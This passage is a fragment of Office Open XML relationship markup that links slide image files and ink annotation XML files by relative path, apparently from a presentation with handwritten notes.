Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink95.xml"/><Relationship Id="rId107" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image139.png"/><Relationship Id="rId11" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image93.png"/><Relationship Id="rId32" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image102.png"/><Relationship Id="rId37" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink106.xml"/><Relationship Id="rId53" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink114.xml"/><Relationship Id="rId58" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image115.png"/><Relationship Id="rId74" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink125.xml"/><Relationship Id="rId79" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image125.png"/><Relationship Id="rId102" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink139.xml"/><Relationship Id="rId123" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image147.png"/><Relationship Id="rId128" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink152.xml"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image90.png"/><Relationship Id="rId90" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink133.xml"/><Relationship Id="rId95" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image133.png"/><Relationship Id="rId22" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image97.png"/><Relationship Id="rId27" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink101.xml"/><Relationship Id="rId43" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink109.xml"/><Relationship Id="rId48" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image110.png"/><Relationship Id="rId64" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image118.png"/><Relationship Id="rId69" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image120.png"/><Relationship Id="rId113" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image142.png"/><Relationship Id="rId118" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink147.xml"/><Relationship Id="rId134" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink155.xml"/><Relationship Id="rId80" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink128.xml"/><Relationship Id="rId85" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image128.png"/><Relationship Id="rId12" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink93.xml"/><Relationship Id="rId17" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image83.png"/><Relationship Id="rId33" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink104.xml"/><Relationship Id="rId38" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image105.png"/><Relationship Id="rId59" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink117.xml"/><Relationship Id="rId103" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image137.png"/><Relationship Id="rId108" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink142.xml"/><Relationship Id="rId124" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink150.xml"/><Relationship Id="rId129" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image150.png"/><Relationship Id="rId54" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image113.png"/><Relationship Id="rId70" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink123.xml"/><Relationship Id="rId75" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image123.png"/><Relationship Id="rId91" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image131.png"/><Relationship Id="rId96" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink1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0.xml"/><Relationship Id="rId23" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink99.xml"/><Relationship Id="rId28" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image100.png"/><Relationship Id="rId49" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink112.xml"/><Relationship Id="rId114" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink145.xml"/><Relationship Id="rId119" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image145.png"/><Relationship Id="rId44" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image108.png"/><Relationship Id="rId60" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image116.png"/><Relationship Id="rId65" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink120.xml"/><Relationship Id="rId81" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image126.png"/><Relationship Id="rId86" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink131.xml"/><Relationship Id="rId130" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink153.xml"/><Relationship Id="rId135" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image153.png"/><Relationship Id="rId13" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image94.png"/><Relationship Id="rId18" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink96.xml"/><Relationship Id="rId39" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink107.xml"/><Relationship Id="rId109" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image140.png"/><Relationship Id="rId34" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image103.png"/><Relationship Id="rId50" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image111.png"/><Relationship Id="rId55" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink115.xml"/><Relationship Id="rId76" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink126.xml"/><Relationship Id="rId97" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image134.png"/><Relationship Id="rId104" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink140.xml"/><Relationship Id="rId120" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink148.xml"/><Relationship Id="rId125" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image148.png"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image91.png"/><Relationship Id="rId71" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image121.png"/><Relationship Id="rId92" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink134.xml"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink88.xml"/><Relationship Id="rId29" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink102.xml"/><Relationship Id="rId24" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image98.png"/><Relationship Id="rId40" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image106.png"/><Relationship Id="rId45" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink110.xml"/><Relationship Id="rId66" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink121.xml"/><Relationship Id="rId87" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image129.png"/><Relationship Id="rId110" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink143.xml"/><Relationship Id="rId115" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image143.png"/><Relationship Id="rId131" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image151.png"/><Relationship Id="rId136" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink156.xml"/><Relationship Id="rId61" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink118.xml"/><Relationship Id="rId82" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink129.xml"/><Relationship Id="rId19" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink97.xml"/><Relationship Id="rId14" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink94.xml"/><Relationship Id="rId30" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image101.png"/><Relationship Id="rId35" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink105.xml"/><Relationship Id="rId56" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image114.png"/><Relationship Id="rId77" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image124.png"/><Relationship Id="rId100" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink138.xml"/><Relationship Id="rId105" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image138.png"/><Relationship Id="rId126" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink151.xml"/><Relationship Id="rId8" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink91.xml"/><Relationship Id="rId51" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink113.xml"/><Relationship Id="rId72" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink124.xml"/><Relationship Id="rId93" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image132.png"/><Relationship Id="rId98" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink137.xml"/><Relationship Id="rId121" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image146.png"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image89.png"/><Relationship Id="rId25" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink100.xml"/><Relationship Id="rId46" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image109.png"/><Relationship Id="rId67" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image119.png"/><Relationship Id="rId116" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink146.xml"/><Relationship Id="rId20" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image96.png"/><Relationship Id="rId41" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink108.xml"/><Relationship Id="rId62" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image117.png"/><Relationship Id="rId83" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image127.png"/><Relationship Id="rId88" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink132.xml"/><Relationship Id="rId111" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image141.png"/><Relationship Id="rId132" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink154.xml"/><Relationship Id="rId15" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image95.png"/><Relationship Id="rId36" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image104.png"/><Relationship Id="rId57" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink116.xml"/><Relationship Id="rId106" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink141.xml"/><Relationship Id="rId127" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image149.png"/><Relationship Id="rId10" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink92.xml"/><Relationship Id="rId31" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink103.xml"/><Relationship Id="rId52" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image112.png"/><Relationship Id="rId73" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image122.png"/><Relationship Id="rId78" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink127.xml"/><Relationship Id="rId94" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink135.xml"/><Relationship Id="rId99" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image135.png"/><Relationship Id="rId101" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image136.png"/><Relationship Id="rId122" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink149.xml"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink89.xml"/><Relationship Id="rId9" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image92.png"/><Relationship Id="rId26" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image99.png"/><Relationship Id="rId47" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink111.xml"/><Relationship Id="rId68" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink122.xml"/><Relationship Id="rId89" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image130.png"/><Relationship Id="rId112" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink144.xml"/><Relationship Id="rId133" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image152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9.xml"/><Relationship Id="rId117" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image210.png"/><Relationship Id="rId21" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image163.png"/><Relationship Id="rId42" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink177.xml"/><Relationship Id="rId47" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image176.png"/><Relationship Id="rId63" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image184.png"/><Relationship Id="rId68" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink190.xml"/><Relationship Id="rId84" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink198.xml"/><Relationship Id="rId89" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image196.png"/><Relationship Id="rId112" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink212.xml"/><Relationship Id="rId16" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink164.xml"/><Relationship Id="rId107" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image205.png"/><Relationship Id="rId11" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image158.png"/><Relationship Id="rId32" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink172.xml"/><Relationship Id="rId37" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image171.png"/><Relationship Id="rId53" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image179.png"/><Relationship Id="rId58" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink185.xml"/><Relationship Id="rId74" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink193.xml"/><Relationship Id="rId79" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image191.png"/><Relationship Id="rId102" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink207.xml"/><Relationship Id="rId123" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image213.png"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image155.png"/><Relationship Id="rId90" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink201.xml"/><Relationship Id="rId95" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image199.png"/><Relationship Id="rId22" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink167.xml"/><Relationship Id="rId27" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image166.png"/><Relationship Id="rId43" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image174.png"/><Relationship Id="rId48" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink180.xml"/><Relationship Id="rId64" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink188.xml"/><Relationship Id="rId69" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image187.png"/><Relationship Id="rId113" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image208.png"/><Relationship Id="rId118" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink215.xml"/><Relationship Id="rId80" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink196.xml"/><Relationship Id="rId85" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image194.png"/><Relationship Id="rId12" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink162.xml"/><Relationship Id="rId17" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image161.png"/><Relationship Id="rId33" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image169.png"/><Relationship Id="rId38" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink175.xml"/><Relationship Id="rId59" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image182.png"/><Relationship Id="rId103" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image203.png"/><Relationship Id="rId108" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink210.xml"/><Relationship Id="rId124" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink218.xml"/><Relationship Id="rId54" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink183.xml"/><Relationship Id="rId70" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink191.xml"/><Relationship Id="rId75" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image83.png"/><Relationship Id="rId91" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image197.png"/><Relationship Id="rId96" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink20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9.xml"/><Relationship Id="rId23" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image164.png"/><Relationship Id="rId28" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink170.xml"/><Relationship Id="rId49" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image177.png"/><Relationship Id="rId114" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink213.xml"/><Relationship Id="rId119" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image211.png"/><Relationship Id="rId44" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink178.xml"/><Relationship Id="rId60" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink186.xml"/><Relationship Id="rId65" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image185.png"/><Relationship Id="rId81" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image192.png"/><Relationship Id="rId86" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink199.xml"/><Relationship Id="rId13" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image159.png"/><Relationship Id="rId18" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink165.xml"/><Relationship Id="rId39" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image172.png"/><Relationship Id="rId109" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image206.png"/><Relationship Id="rId34" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink173.xml"/><Relationship Id="rId50" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink181.xml"/><Relationship Id="rId55" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image180.png"/><Relationship Id="rId76" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink194.xml"/><Relationship Id="rId97" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image200.png"/><Relationship Id="rId104" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink208.xml"/><Relationship Id="rId120" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink216.xml"/><Relationship Id="rId125" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image214.png"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image156.png"/><Relationship Id="rId71" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image188.png"/><Relationship Id="rId92" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink202.xml"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink157.xml"/><Relationship Id="rId29" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image167.png"/><Relationship Id="rId24" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink168.xml"/><Relationship Id="rId40" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink176.xml"/><Relationship Id="rId45" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image175.png"/><Relationship Id="rId66" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink189.xml"/><Relationship Id="rId87" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image195.png"/><Relationship Id="rId110" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink211.xml"/><Relationship Id="rId115" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image209.png"/><Relationship Id="rId61" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image183.png"/><Relationship Id="rId82" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink197.xml"/><Relationship Id="rId19" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image162.png"/><Relationship Id="rId14" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink163.xml"/><Relationship Id="rId30" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink171.xml"/><Relationship Id="rId35" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image170.png"/><Relationship Id="rId56" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink184.xml"/><Relationship Id="rId77" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image190.png"/><Relationship Id="rId100" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink206.xml"/><Relationship Id="rId105" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image204.png"/><Relationship Id="rId8" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink160.xml"/><Relationship Id="rId51" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image178.png"/><Relationship Id="rId72" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink192.xml"/><Relationship Id="rId93" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image198.png"/><Relationship Id="rId98" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink205.xml"/><Relationship Id="rId121" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image212.png"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image154.png"/><Relationship Id="rId25" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image165.png"/><Relationship Id="rId46" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink179.xml"/><Relationship Id="rId67" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image186.png"/><Relationship Id="rId116" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink214.xml"/><Relationship Id="rId20" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink166.xml"/><Relationship Id="rId41" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image173.png"/><Relationship Id="rId62" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink187.xml"/><Relationship Id="rId83" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image193.png"/><Relationship Id="rId88" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink200.xml"/><Relationship Id="rId111" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image207.png"/><Relationship Id="rId15" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image160.png"/><Relationship Id="rId36" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink174.xml"/><Relationship Id="rId57" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image181.png"/><Relationship Id="rId106" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink209.xml"/><Relationship Id="rId10" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink161.xml"/><Relationship Id="rId31" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image168.png"/><Relationship Id="rId52" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink182.xml"/><Relationship Id="rId73" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image189.png"/><Relationship Id="rId78" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink195.xml"/><Relationship Id="rId94" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink203.xml"/><Relationship Id="rId99" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image201.png"/><Relationship Id="rId101" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image202.png"/><Relationship Id="rId122" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink217.xml"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink158.xml"/><Relationship Id="rId9" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image15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/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink21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72.png"/><Relationship 